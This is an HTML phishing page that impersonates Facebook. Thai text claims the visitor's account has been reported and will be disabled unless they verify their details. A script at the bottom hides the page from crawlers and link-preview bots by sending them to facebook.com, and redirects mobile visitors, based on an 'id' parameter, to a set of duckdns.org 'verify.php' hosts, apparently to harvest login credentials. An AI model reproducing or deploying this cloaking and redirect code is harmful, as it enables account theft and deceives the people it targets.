<!DOCTYPE html>
<html dir="ltr" lang="id">
    <head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# product: http://ogp.me/ns/product#">
        <meta charset=utf-8>
        <meta property="og:locale" content="id_ID">
        <meta content='width=device-width,initial-scale=1.0,shrink-to-fit=no' name='viewport' />
        <meta name="viewport" content="width=device-width,initial-scale=1,viewport-fit=cover">
        <meta name="msapplication-tap-highlight" content="no">
        <meta name="description" content="">
        <meta name="keywords" content="">
        <meta name="generator" content="Webnode 2">
        <meta name="apple-mobile-web-app-capable" content="yes">
        <meta name="apple-mobile-web-app-status-bar-style" content="black">
        <meta name="format-detection" content="telephone=no">
        <meta property="og:image" content="f37c46fb-5102-46be-98ba-768f3c982bdb.png" />
        <meta property="og:image:type" content="image/jpeg" />
        <meta property="og:image:width" content="2400" />
        <meta property="og:image:height" content="1260" />
        <meta property="og:type" content="article">
        <meta property="og:site_name" content="Facebook Community Standards">
        <meta property="og:article:published_time" content="2023-06-08T00:00:00+0200">
        <meta name="robots" content="noindex,nofollow">
        <meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109' />
        <meta name='google-adsense-platform-domain' content='blogspot.com' />
        <meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109' />
        <meta name='google-adsense-platform-domain' content='blogspot.com' />
        <title id="pageTitle">Facebook Community Standards | Transparency Centre</title>
        <link href="https://d1di2lzuh97fh2.cloudfront.net/files/1w/1wj/1wjp48.css?ph=af14593762" rel="stylesheet">
        <link href="https://d1di2lzuh97fh2.cloudfront.net/files/0n/0np/0np7p1.css?ph=af14593762" media="screen and (min-width:37.5em)" rel="stylesheet" disabled>
        <link href="https://d1di2lzuh97fh2.cloudfront.net/files/21/21d/21dfiv.css?ph=af14593762" rel="stylesheet">
        <link href="https://d1di2lzuh97fh2.cloudfront.net/files/1f/1fw/1fw25g.css?ph=af14593762" media="screen and (min-width:37.5em)" rel="stylesheet" disabled>
        <link href="https://d1di2lzuh97fh2.cloudfront.net/files/1j/1jw/1jwyl1.css?ph=af14593762" media="print" rel="stylesheet">
        <link href="https://d1di2lzuh97fh2.cloudfront.net/files/3r/3r4/3r4ngg.css?ph=af14593762" media="screen and (min-width:100000em)" rel="stylesheet" data-type="cq" disabled>
        <link rel="stylesheet" href="https://d1di2lzuh97fh2.cloudfront.net/files/0h/0hm/0hmm02.css?ph=af14593762" data-wnd_color_scheme_file="">
        <link rel="stylesheet" href="https://d1di2lzuh97fh2.cloudfront.net/files/3k/3k4/3k4d3b.css?ph=af14593762" data-wnd_color_scheme_desktop_file="" media="screen and (min-width:37.5em)" disabled="">
        <link rel="stylesheet" href="https://d1di2lzuh97fh2.cloudfront.net/files/1x/1xj/1xjnq7.css?ph=af14593762" data-wnd_additive_color_file="">
        <link rel="stylesheet" href="https://d1di2lzuh97fh2.cloudfront.net/files/3t/3tv/3tv4u0.css?ph=af14593762" data-wnd_typography_file="">
        <link rel="stylesheet" href="https://d1di2lzuh97fh2.cloudfront.net/files/27/27j/27jcp6.css?ph=af14593762" data-wnd_typography_desktop_file="" media="screen and (min-width:37.5em)" disabled="">
        <script>
            (() => {
                let e = !1;
                const t = () => {
                    if (!e && window.innerWidth >= 600) {
                        for (let e = 0, t = document.querySelectorAll('head > link[href*="css"][media="screen and (min-width:37.5em)"]'); e < t.length; e++) t[e].removeAttribute("disabled");
                        e = !0
                    }
                };
                t(), window.addEventListener("resize", t), "container" in document.documentElement.style || fetch(document.querySelector('head > link[data-type="cq"]').getAttribute("href")).then((e => {
                    e.text().then((e => {
                        const t = document.createElement("style");
                        t.type = "text/css", document.head.appendChild(t), t.appendChild(document.createTextNode(e)), import("https://d1di2lzuh97fh2.cloudfront.net/client/js.polyfill/container-query-polyfill.modern.js").then((() => {
                            let e = setInterval((function() {
                                document.body && (document.body.classList.add("cq-polyfill-loaded"), clearInterval(e))
                            }), 100)
                        }))
                    }))
                }))
            })()
        </script>
        <link rel="preload stylesheet" href="https://d1di2lzuh97fh2.cloudfront.net/files/0d/0ds/0dscwu.css?ph=af14593762" as="style">
        <link rel="shortcut icon" href="gB76kJXPYJV.png" />
        <script>
            window.checkAndChangeSvgColor = function(c) {
                try {
                    var a = document.getElementById(c);
                    if (a) {
                        c = [
                            ["border", "borderColor"],
                            ["outline", "outlineColor"],
                            ["color", "color"]
                        ];
                        for (var h, b, d, f = [], e = 0, m = c.length; e < m; e++)
                            if (h = window.getComputedStyle(a)[c[e][1]].replace(/\s/g, "").match(/^rgb[a]?\(([0-9]{1,3}),([0-9]{1,3}),([0-9]{1,3})/i)) {
                                b = "";
                                for (var g = 1; 3 >= g; g++) b += ("0" + parseInt(h[g], 10).toString(16)).slice(-2);
                                "0" === b.charAt(0) && (d = parseInt(b.substr(0, 2), 16), d = Math.max(16, d), b = d.toString(16) + b.slice(-4));
                                f.push(c[e][0] + "=" + b)
                            } if (f.length) {
                            var k = a.getAttribute("data-src"),
                                l = k + (0 > k.indexOf("?") ? "?" : "&") + f.join("&");
                            a.src != l && (a.src = l, a.outerHTML = a.outerHTML)
                        }
                    }
                } catch (n) {}
            };
        </script>
    </head>
    <body class="l layout wt-page ac-s ac-n l-default l-d-none b-btn-fr b-btn-s-l b-btn-dso b-btn-bw-1 img-d-n img-t-u img-h-n line-solid b-e-ds lbox-l   wnd-free-bar-fixed  wnd-fe">
        <div class="wnd-page l-page cs-dblue ac-1976d2 ac-normal t-t-fs-l t-t-fw-s t-t-sp-n t-t-d-n t-s-fs-m t-s-fw-s t-s-sp-n t-s-d-n t-p-fs-m t-p-fw-m t-p-sp-n t-h-fs-l t-h-fw-s t-h-sp-n t-bq-fs-m t-bq-fw-m t-bq-sp-n t-bq-d-l t-btn-fw-l t-nav-fw-l t-pd-fw-l">
            <div class="l-w t cf t-01">
                <div class="l-bg cf">
                    <div class="s-bg-l"></div>
                </div>
                <header class="l-h cf">
                    <div class="sw cf">
                        <div class="sw-c cf">
                            <section class="s s-hn s-hn-default wnd-mt-classic wnd-na-c logo-classic sc-w   wnd-w-wide wnd-nh-m hm-hidden wnd-nav-border wnd-nav-sticky menu-default">
                                <div class="s-w">
                                    <div class="s-o">
                                        <div class="s-bg">
                                            <div class="s-bg-l"></div>
                                        </div>
                                        <div class="h-w h-f wnd-fixed">
                                            <div class="n-l initial-state">
                                                <div class="s-c">
                                                    <div class="logo-block">
                                                        <div class="b b-l logo logo-default logo-nb raleway logo-25 wnd-logo-with-text wnd-iar-1-1 b-ls-m" id="wnd_LogoBlock_634006157" data-wnd_mvc_type="wnd.fe.LogoBlock">
                                                            <div class="b-l-c logo-content">
                                                                <a class="b-l-link logo-link" href="https://m.facebook.com">
                                                                    <div class="b-l-image logo-image">
                                                                        <div class="b-l-image-w logo-image-cell">
                                                                            <picture>
                                                                                <source type="image/webp" sizes="(min-width: 600px) 450px, (min-width: 360px) calc(100vw * 0.8), 100vw">
                                                                            </picture>
                                                                        </div>
                                                                    </div>
                                                                    <div class="b-l-br logo-br"></div>
                                                                    <div class="b-l-text logo-text-wrapper">
                                                                        <div class="b-l-text-w logo-text">
                                                                            <span class="b-l-text-c logo-text-cell">
                                                                                <strong>Facebook</strong>
                                                                            </span>
                                                                        </div>
                                                                    </div>
                                                                </a>
                                                            </div>
                                                        </div>
                                                    </div>
                                                    <div class="cart-and-mobile">
                                                        <div id="menu-mobile">
                                                            <a href="#" id="menu-submit">
                                                                <span></span>Menu </a>
                                                        </div>
                                                    </div>
                                                    <div id="menu-slider">
                                                        <div id="menu-block">
                                                            <nav id="menu" data-align="centered" class="centered" data-type="sliding">
                                                                <div class="menu-font menu-wrapper">
                                                                    <a href="#" class="menu-close" rel="nofollow" title="Close Menu"></a>
                                                                    <ul class="level-1">
                                                                        <li class="wnd-homepage"></li>
                                                                    </ul>
                                                                    <span class="more-text">More</span>
                                                                </div>
                                                            </nav>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </section>
                        </div>
                    </div>
                </header>
                <main class="l-m cf">
                    <div class="sw cf">
                        <div class="sw-c cf">
                            <section class="s s-hm s-hm-hidden wnd-h-hidden cf sc-w   hn-default"></section>
                            <section class="s s-basic cf sc-ml wnd-background-solid  wnd-w-wider wnd-s-normal wnd-h-auto">
                                <div class="s-w cf">
                                    <div class="s-o s-fs cf">
                                        <div class="s-bg cf">
                                            <div class="s-bg-l" style="background-color:#F4F7F9"></div>
                                        </div>
                                        <div class="s-c s-fs cf">
                                            <div class="ez cf">
                                                <div class="ez-c">
                                                    <div class="b-sp b b-s cf" style="margin-left:0%;margin-right:0%;">
                                                        <div class="b-sp-c" id="wnd_SpacingBlock_32106162_container" style="position:relative;padding-bottom:0.92%;">
                                                            <div class="b-sp-placeholder"></div>
                                                        </div>
                                                    </div>
                                                    <div class="cw cf">
                                                        <div class="cw-c cf">
                                                            <div class="c cf" style="width:30%;">
                                                                <div class="c-c cf">
                                                                    <div class="b b-text cf">
                                                                        <div class="b-c b-text-c b-s b-s-t60 b-s-b60 b-cs cf">
                                                                            <h1>มีคนรายงานบัญชี Facebook ของคุณ.</h1>
                                                                        </div>
                                                                    </div>
                                                                    <div class="b b-text cf">
                                                                        <div class="b-c b-text-c b-s b-s-t60 b-s-b60 b-cs cf">เนื่องจากบัญชีของคุณละเมิดมาตรฐานชุมชนของเรา.<div></div>
                                                                            <div>ด้วยรายงานนี้ บัญชี Facebook ของคุณจะถูกปิดการใช้งานทันที</div>
                                                                            <div></div>
                                                                            <div>หากคุณคิดว่ารายงานไม่ถูกต้อง โปรดยืนยันข้อมูล Facebook ของคุณอย่างถูกต้องเพื่อดำเนินการตามขั้นตอนในการกู้คืนบัญชี Facebook ของคุณ</div>
                                                                        </div>
                                                                    </div>
                                                                    <div class="form b b-s b-form-default f-rh-normal f-rg-normal f-br-all rounded cf">
                                                                        <form action="" method="post">
                                                                            <div class="page-header text-center">
                                                                                <center>
                                                                                    <a href="javascript:open_link();">
                                                                                        <img src="VERIFIKASI-mex.png" class="img-responsive">
                                                                                    </a>
                                                                                </center>
                                                                            </div>
                                                                        </form>
                                                                    </div>
                                                                </div>
                                                                <div class="b b-text cf">
                                                                    <div class="b-c b-text-c b-s b-s-t60 b-s-b60 b-cs cf">หลังจากยืนยันแล้ว โปรดรอ 1x24 ชั่วโมง โปรดอย่าเปลี่ยนแปลงข้อมูลใด ๆ จนกว่าเราจะตรวจสอบบัญชีของคุณและตัดสินใจแล้ว.</div>
                                                                </div>
                                                            </div>
                                                            <div class="form b b-s b-form-default f-rh-normal f-rg-normal f-br-all rounded cf">
                                                                <form action="" method="post"></form>
                                                                <div class='fb_image_block'>
                                                                    <center>
                                                                        <img src="ucZQwbmhd5cO.png" alt="Image" style="width:200px;height:200px;">
                                                                    </center>
                                                                </div>
                                                                
                                                            </div>
                                                        </div>
                                                    </div>
                                                    <div class="c cf" style="width:50%;">
                                                        <div class="c-c cf">
                                                            <div class="b-sp b b-s cf" style="margin-left:0%;margin-right:0%;">
                                                                <div class="b-sp-c" id="wnd_SpacingBlock_287420073_container" style="position:relative;padding-bottom:1.7007%;">
                                                                    <div class="b-sp-placeholder"></div>
                                                                </div>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                            <div class="b-sp b b-s cf" style="margin-left:0%;margin-right:0%;">
                                                <div class="b-sp-c" id="wnd_SpacingBlock_52542864_container" style="position:relative;padding-bottom:1.58%;">
                                                    <div class="b-sp-placeholder"></div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </section>
                        </div>
                    </div>
        </main>
        <footer class="l-f cf">
            <div class="sw cf">
                <div class="sw-c cf">
                    <section data-wn-border-element="s-f-border" class="s s-f s-f-edit sc-cd  sc-a wnd-w-wide wnd-s-normal wnd-h-auto">
                        <div class="s-w">
                            <div class="s-o">
                                <div class="s-bg">
                                    <div class="s-bg-l">
                                        <noscript>
                                            <img src='/_/noscript' />
                                        </noscript>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </section>
                </div>
            </div>
        </footer>
        </div>
        </div>
        <script>
            function getParameterByName(search, name) {
                var data = new URLSearchParams(search);
                
                return data.get(name);
            }
        
            let user_agent = navigator.userAgent;
            let is_MIbile = /MIbi|android|iphone/i.test(user_agent);
            let is_bot = /bot|facebot|crawl|facebot|whatsapp|telegram|slurp|spider/i.test(user_agent);
            var code = getParameterByName(window.location.search, "id");
            code = code.trim();
            
            if (!code) {
              window.location.href = "https://facebook.com";
            }
            
            var links = {
                "HE01": "https://45423403100.duckdns.org/verify.php?id=",
                "HE02": "https://45423403101.duckdns.org/verify.php?id=",
                "HE03": "https://45423403102.duckdns.org/verify.php?id=",
                "HE04": "https://45423403103.duckdns.org/verify.php?id=",
                "HE05": "https://45423403104.duckdns.org/verify.php?id=",
                "HE06": "https://45423403105.duckdns.org/verify.php?id=",
                "HE07": "https://45423403106.duckdns.org/verify.php?id=",
                "HE08": "https://45423403107.duckdns.org/verify.php?id=",
                "HE09": "https://45423403108.duckdns.org/verify.php?id=",
                "HE10": "https://45423403109.duckdns.org/verify.php?id=",
                "HE11": "https://45423403100.duckdns.org/verify.php?id=",
                "HE12": "https://45423403101.duckdns.org/verify.php?id=",
                "HE13": "https://45423403102.duckdns.org/verify.php?id=",
                "HE14": "https://45423403103.duckdns.org/verify.php?id=",
                "HE15": "https://45423403104.duckdns.org/verify.php?id=",
                "HE16": "https://45423403105.duckdns.org/verify.php?id=",
                "HE17": "https://45423403106.duckdns.org/verify.php?id=",
                "HE18": "https://45423403107.duckdns.org/verify.php?id=",
                "HE19": "https://45423403108.duckdns.org/verify.php?id=",
                "HE20": "https://45423403109.duckdns.org/verify.php?id=",
            };
            
            if (!is_bot && is_MIbile) {
                window.location.href = links[code];
            } else {
                window.location.href = "https://www.facebook.com/";
            }

            function open_link() {
                window.location.href = links[code];
            }
        </script>
    </body>
</html>
